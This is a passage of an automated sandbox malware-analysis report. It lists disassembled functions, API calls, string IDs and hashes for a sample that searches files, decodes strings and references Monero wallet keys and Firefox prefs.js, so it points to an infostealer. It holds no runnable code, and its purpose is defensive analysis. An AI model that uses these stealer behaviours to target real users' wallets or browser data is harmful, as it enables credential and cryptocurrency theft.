                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 9bc89f6eca6a29092360c1ce0cff07016e2e9a57b259f23652b0b6f7ce1fcef2
                              • Instruction ID: c420e1c7eebdec4961fbf0af64846ca667bd4208066dfae6aea03a91e68b7224
                              • Opcode Fuzzy Hash: 9bc89f6eca6a29092360c1ce0cff07016e2e9a57b259f23652b0b6f7ce1fcef2
                              • Instruction Fuzzy Hash: 08B15171900618ABCB26FF64DCD6AEE7778AF54300F4081A8E44A9F141EF346B49DF92
                              Function 003216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0034510C,?,?,?,003451B4,?,?,00000000,?,00000000), ref: 00321923
                              • StrCmpCA.SHLWAPI(?,0034525C), ref: 00321973
                              • StrCmpCA.SHLWAPI(?,00345304), ref: 00321989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00321D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00321DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00321E20
                              • FindClose.KERNEL32(000000FF), ref: 00321E32
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: de84090e3dd9840cc731b3392caee21ee03d1571ab73cf4f4ffd9e74e19f8fd3
                              • Instruction ID: 3549a3f7b6e97e23b4d1f0c7bb6316c7f53bc422a95b581fa0fd3d1dedce9e1d
                              • Opcode Fuzzy Hash: de84090e3dd9840cc731b3392caee21ee03d1571ab73cf4f4ffd9e74e19f8fd3
                              • Instruction Fuzzy Hash: EF123F71910618ABCB1AFB60DCD6EEE7778AF54300F404199B14A6E091EF346F89DFA1
                              Function 0032DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00340C2E), ref: 0032DE5E
                              • StrCmpCA.SHLWAPI(?,003414C8), ref: 0032DEAE
                              • StrCmpCA.SHLWAPI(?,003414CC), ref: 0032DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0032E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 0a4a38754ee9137f87b802e2486bb406b96f7204e5b3eeb47f471106bc5bd298
                              • Instruction ID: a7a518a200001bd7cb665231b75fca8c31e87ac485f960320ae4266a49d76c47
                              • Opcode Fuzzy Hash: 0a4a38754ee9137f87b802e2486bb406b96f7204e5b3eeb47f471106bc5bd298
                              • Instruction Fuzzy Hash: CEF1CF71814618AADB17FB60DCD6EEE7778BF14300F8141D9A04A6A091EF346F8ADF52
                              Function 0032DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003414B0,00340C2A), ref: 0032DAEB
                              • StrCmpCA.SHLWAPI(?,003414B4), ref: 0032DB33
                              • StrCmpCA.SHLWAPI(?,003414B8), ref: 0032DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0032DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d671df6b75ef0e0f2939110bbb54e95d722ff01a357b7050a85aae9dd29dc71d
                              • Instruction ID: b1a51921c2921da26dc804ef69c3819c66ab944fd95c6e66bace71210e4ffec2
                              • Opcode Fuzzy Hash: d671df6b75ef0e0f2939110bbb54e95d722ff01a357b7050a85aae9dd29dc71d
                              • Instruction Fuzzy Hash: 23915572900514A7CB16FBB4ECD69ED777CAF94300F408558F94A9F181EE34AB498B92
                              Function 006E8033 Relevance: 11.6, Strings: 8, Instructions: 1599COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4%$v$E,:$IP?$_Mvg$mt?}$z@S${oso$q
                              • API String ID: 0-1417705900
                              • Opcode ID: 18af393bde6e25a49fa32243555347213ce128299c91864e731773224f14bc6d
                              • Instruction ID: d8ec8f3b30f52b1ce93f6a932aa3cd8110241a8f4e505c5632fe8553115fba0e
                              • Opcode Fuzzy Hash: 18af393bde6e25a49fa32243555347213ce128299c91864e731773224f14bc6d
                              • Instruction Fuzzy Hash: 3AB2F5F390C2009FE3046E29EC8567ABBE5EF94720F1A493DEAC4C7744EA3598158797
                              Function 00337B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,003405AF), ref: 00337BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00337BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00337C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00337C62
                              • LocalFree.KERNEL32(00000000), ref: 00337D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 29e6aba988284635bc6bfada7e14755b0437ddbefac3295b769851bdfbb48000
                              • Instruction ID: bcb8d806c4d65a581d152d67236be5e9f6cc8d6abd2e0eae8b9be187f79b7194
                              • Opcode Fuzzy Hash: 29e6aba988284635bc6bfada7e14755b0437ddbefac3295b769851bdfbb48000
                              • Instruction Fuzzy Hash: C4416C71940218ABCB25DB94DCC9BEEB7B8FF44700F204199E0096A180DB742F85CFA1
                              Function 0032E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00340D73), ref: 0032E4A2
                              • StrCmpCA.SHLWAPI(?,003414F8), ref: 0032E4F2
                              • StrCmpCA.SHLWAPI(?,003414FC), ref: 0032E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a43578503804d378465782333618652cb7272843aee4cd8887dba554fc71c106
                              • Instruction ID: b845e88067c7575adc1f018cd50b17d5ef159339af746ab96151352f8a0bde73
                              • Opcode Fuzzy Hash: a43578503804d378465782333618652cb7272843aee4cd8887dba554fc71c106
                              • Instruction Fuzzy Hash: A5125371910618AADB16FB60DCD6EED7378AF54300F4041A8F54AAE191EF346F89CF92
                              Function 006E2FAC Relevance: 9.1, Strings: 6, Instructions: 1640COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7?$q1mh$su3s$w^$=7V$kz
                              • API String ID: 0-4251055165
                              • Opcode ID: 7a37fea4b47989297ab20c014e431b8561edd62e5b97bfdf6411fded3da50ea3
                              • Instruction ID: 1642656e8455cfdf7eb31fef762cc1600a1de7c9cb9699f26f9378be68c64802
                              • Opcode Fuzzy Hash: 7a37fea4b47989297ab20c014e431b8561edd62e5b97bfdf6411fded3da50ea3
                              • Instruction Fuzzy Hash: BAB2F5F3A0C200AFE3046E2DEC8567ABBE9EF94720F1A493DE6C5C7744E63558458693
                              Function 006E4A8B Relevance: 9.1, Strings: 6, Instructions: 1569COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: L7G$BEDo$e5}$kwg{$qyT$P}}
                              • API String ID: 0-1244562776
                              • Opcode ID: 5552fec90f906e00a517a59d19cff2343a55740531b7d089a6637bd818fe069e
                              • Instruction ID: db2f5dd650630cf5e411eb4acfb9cc4cfe237534b16dfbc9345992acce370653
                              • Opcode Fuzzy Hash: 5552fec90f906e00a517a59d19cff2343a55740531b7d089a6637bd818fe069e
                              • Instruction Fuzzy Hash: B4B2F1F360C2049FE704AE29EC8567AFBE5EF94320F16892DE6C4C3744EA7598458787
                              Function 00329AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                              • LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: N2
                              • API String ID: 4291131564-1109174167
                              • Opcode ID: 1313c018c2faf84b2c4518090b51466dede7921d3e306a0423826208429486e5
                              • Instruction ID: 1dd05587ee5fb1cf77def7a9688ab6d426282c1dbcd8fef53d009a7274c5eff8
                              • Opcode Fuzzy Hash: 1313c018c2faf84b2c4518090b51466dede7921d3e306a0423826208429486e5
                              • Instruction Fuzzy Hash: B511A2B4240208EFEB10CFA4DC95FAA77B5FB89700F208059F9159B390C7B6A901DB90
                              Function 006EB64A Relevance: 7.8, Strings: 5, Instructions: 1553COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
